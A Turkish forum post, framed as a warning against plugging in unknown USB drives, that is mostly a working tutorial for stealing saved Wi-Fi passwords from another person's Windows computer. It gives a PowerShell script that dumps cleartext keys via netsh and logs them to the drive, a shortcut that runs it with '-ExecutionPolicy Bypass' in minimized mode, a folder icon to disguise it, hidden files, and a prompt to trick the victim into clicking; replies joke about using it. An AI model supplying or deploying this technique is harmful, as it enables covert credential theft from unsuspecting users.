Bilmediğimiz Cihazları Neden Bilgisayarımıza Takmamalıyız?

Logarech

▐━━━━━━━━━▌
Mesajlar
174
En iyi cevaplar
0
Beğeniler
112
Puanları
790
Ruh hali
Bu yazıda basit bir senaryo ile hedef bilgisayarın bağlandığı ve diğer kayıtlı wifi parolalarını nasıl ele geçirebileceğimizden bahsedeceğim. Yazıdaki amacım veriler ne kadar güvende olursa olsun veri hırsızlığının bu yönden bakınca aslında ne kadar basit olduğunu göstermek ve bu nedenle bilmediğimiz USB, SD card veya taşınabilir hard disk gibi cihazları neden bilgisayarımıza takmamamız gerektiğini anlatmak. Kısaca senaryomuz şöyle:

Hedef bilgisayara script ile hazırladığımız USB belleğimizi takıp scripti çalıştırma dosyasını sıradan bir dosyaymış gibi manipüle edip karşı tarafın kendi eliyle çalıştırmasını sağlamak böylece kayıtlı wifi parolalarını usb bellek içine kaydetmek.

Öncelikle belleğimizi hazırlayalım. Boş bir metin belgesi açıyoruz ve kısa süren araştırma sonucu bulduğum PowerShell scriptini kopyalıyoruz:

Kod:
$listProfiles = netsh wlan show profiles | Select-String -Pattern "All User Profile" | %{ ($_ -split ":")[-1].Trim() };
$listProfiles | foreach {
    $profileInfo = netsh wlan show profiles name=$_ key="clear";
    $SSID = $profileInfo | Select-String -Pattern "SSID Name" | %{ ($_ -split ":")[-1].Trim() };
    $Key = $profileInfo | Select-String -Pattern "Key Content" | %{ ($_ -split ":")[-1].Trim() };
    [PSCustomObject]@{
        WifiProfileName = $SSID;
        Password = $Key
    }
}

Bize istediğimizi gösterecek kodlar bunlar ancak çıktısını daha sonra kendi bilgisayarımızda da görebilmek için belleğin herhangi bir yerine kaydetmek için:

En üst satıra

Kod:
Start-Transcript -Path "DOSYA YOLU"

En alt satıra

Kod:
Stop-Transcript

kodlarını ekliyoruz. Dosya yolunu belleğin içinde olması şartıyla istediğiniz klasörde seçebilirsiniz. Daha sonra farklı kaydet diyip script.ps1 olarak kaydediyoruz. ps1, PowerShell komutlarını toplu halde çalıştırmak için kullandığımız bir dosya uzantısı. Scriptimizi aşağıdaki örnekte görüldüğü gibi hazırladık. (Dosya yolunu değiştirmeniz gerekebilir.)


149222


Sırada scripti karşı tarafın çalıştırması için bir kısayol oluşturacağız. Bu kısayolu sıradan bir klasörmüş gibi göstereceğiz.

script.ps1 dosyamıza sağ tıklayıp kısayol oluşturuyoruz ve oluşturduğumuz kısayolun özelliklerini açıyoruz.

Hedef kısmına

Kod:
powershell.exe -ExecutionPolicy Bypass -File "F:\script.ps"

yazıp ( “-ExecutionPolicy Bypass” parametresini PowerShell’in yürütme politikasını bypass etmek için yazdık) çalıştır kısmından da küçültülmüş modu seçiyoruz. Klasör gibi gözükmesi için de simge değiştir kısmından şu dosya yolunu aratıp klasör ikonunu seçiyoruz.

Kod:
%SystemRoot%\System32\SHELL32.dll


149223


“script.ps1” dosyasını ve “bilgi” klasörünü gizledikten sonra belleğimiz sıradan bir cihaz gibi gözükecektir.


149224


Bu işlemlerden sonra herhangi bir sosyal mühendislik yöntemiyle hedef kullanıcının “pdf listesi” ne tıkladığı anda parolalar, bilgiler klasöründeki bilgi.txt dosyasına yazılacak.


Görüldüğü üzere güvenlik önlemleri ne kadar alınırsa alınsın örneğin parolanın uzunluğu veya şifreleme yöntemi vs. bu senaryodaki gibi çok basit işlemler ile bilgiler ele geçirilebilir. Üstelik biz burada sadece erişim gerektiren PowerShell scripti ile wifi parolalarını çektik. Daha gelişmiş scriptler ve USB takılır takılmaz çalışan zararlı yazılımlar ile bilmediğimiz USB’yi bilgisayarımıza takmak aklımıza gelemeyecek kadar kötü sonuçlar doğurabilir.
 


Vantoxic

"Only" those who are on the right track win.
Mesajlar
717
En iyi cevaplar
3
Beğeniler
410
Puanları
860
Ruh hali
Evimde 24 mbps internet yerine 5 mbps internet olsaydı kesinlikle kullanırdım :D
 

Logarech

▐━━━━━━━━━▌
Mesajlar
174
En iyi cevaplar
0
Beğeniler
112
Puanları
790
Ruh hali
Koyduğun script iş görecek türdenmiş. Kullanmayacağıma söz veremem :DD

Tabii ki deneme amaçlı kullanabilirsiniz ama izinsiz yapıldığı takdirde kötü sonuçlar doğurabilir, dikkat edelim :polis: :)
 
Son düzenleme:

Üst